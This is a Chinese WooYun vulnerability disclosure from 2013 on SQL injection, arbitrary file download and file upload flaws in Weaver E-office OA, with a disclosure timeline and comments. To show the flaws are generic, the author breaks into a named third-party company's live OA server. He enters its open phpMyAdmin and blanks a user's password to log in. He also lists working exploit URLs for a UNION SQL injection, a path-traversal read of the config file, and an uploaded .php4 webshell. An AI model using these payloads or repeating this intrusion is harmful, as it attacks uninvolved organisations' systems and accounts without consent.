当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039855

漏洞标题:泛微E-office OA管理系统# 验证其通用性:SQL注入、任意文件下载、文件上传等漏洞

相关厂商:上海泛微网络科技股份有限公司

漏洞作者: Coody

提交时间:2013-10-16 09:08

修复时间:2014-01-14 09:08

公开时间:2014-01-14 09:08

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-16: 细节已通知厂商并且等待厂商处理中
2013-10-20: 厂商已经确认,细节仅向厂商公开
2013-10-23: 细节向第三方安全合作伙伴开放
2013-12-14: 细节向核心白帽子及相关领域专家公开
2013-12-24: 细节向普通白帽子公开
2014-01-03: 细节向实习白帽子公开
2014-01-14: 细节向公众公开

简要描述:

验证篇来啦

详细说明:

之前发布的两个漏洞
Coody --- WooYun: 泛微E-office OA管理系统存在任意文件下载及文件上传导致任意代码执行(已getshell)
applychen ---- WooYun: 泛微E-office OA管理系统存在SQL注射漏洞可查库
cncert国家互联网应急中心 的回应是:对于通用性还需要进一步确认
今天这篇文章证明一下其通用性(存在SQL注入、任意文件下载、文件上传导致任意代码执行)。


这里需要说明一下:
找到的该案例是通过百度搜索 【泛微oa系统】搜索出来的

QQ图片20131016003212.jpg


地址是 http://www.sjd-logistics.com:8000/ OA地址

QQ图片20131016002951.jpg


主站是 http://www.sjd-logistics.com 上海景鸿国际物流股份有限公司

QQ图片20131016002854.jpg


访问OA正常,在地址根目录下发现phpmyadmin,无需认证直接登录

QQ图片20131016002758.jpg


对于本案中躺枪的 【上海景鸿国际物流股份有限公司】望 @cncert国家互联网应急中心 也通知一声吧。
因为数据库可以直接访问,但是用户密码破解不出来,我就从user表中选了一个 【USER_ID为chenglin】的用户,清空其密码直接登录到OA系统中。但测试结束后已经恢复其原有密码。

漏洞证明:

这个部分来证明确实存在:SQL注入,任意文件下载,文件上传导致代码执行等漏洞


0x01:存在SQL注入
http://www.sjd-logistics.com:8000/general/news/show/read_news.php?NEWS_ID=214 and 1=2 union select 1,user(),database(),4,5,6

QQ图片20131016004000.jpg


0x02:任意文件下载
http://www.sjd-logistics.com:8000/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843

QQ图片20131016004327.jpg


zend解密后

QQ图片20131016005309.jpg


0x03:文件上传导致任意代码执行(上传.php4格式)
http://www.sjd-logistics.com:8000/attachment/478596600/conf1g.php4

QQ图片20131016004709.jpg


最后发一张菜刀连接的图片吧

QQ图片20131016004851.jpg

修复方案:

版权声明:转载请注明来源 Coody@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-10-20 19:00

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-16 09:24 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    验证篇来啦

  2. 2013-10-16 09:26 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    撒版本?

  3. 2013-10-16 09:27 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @袋鼠妈妈 就我验证的,各种版本都存在该问题及通杀

  4. 2013-10-16 11:23 | cncert国家互联网应急中心(乌云厂商)

    虽然是通过非正常途径验证,目前看可以确认了。之前已经将DEMO的问题通报给了泛微公司。

  5. 2013-10-16 11:27 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @cncert国家互联网应急中心 嗯,不知道能否顺便通知一下 躺枪的那个厂商。。。。

  6. 2013-10-16 11:47 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @cncert国家互联网应急中心 ......

  7. 2013-10-16 17:20 | cncert国家互联网应急中心(乌云厂商)

    @cncert国家互联网应急中心 会在新的通报案例中引用这个案例,一般的处置流程会要求厂商做好用户的应急响应工作。

  8. 2013-10-16 17:25 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @cncert国家互联网应急中心 自言自语?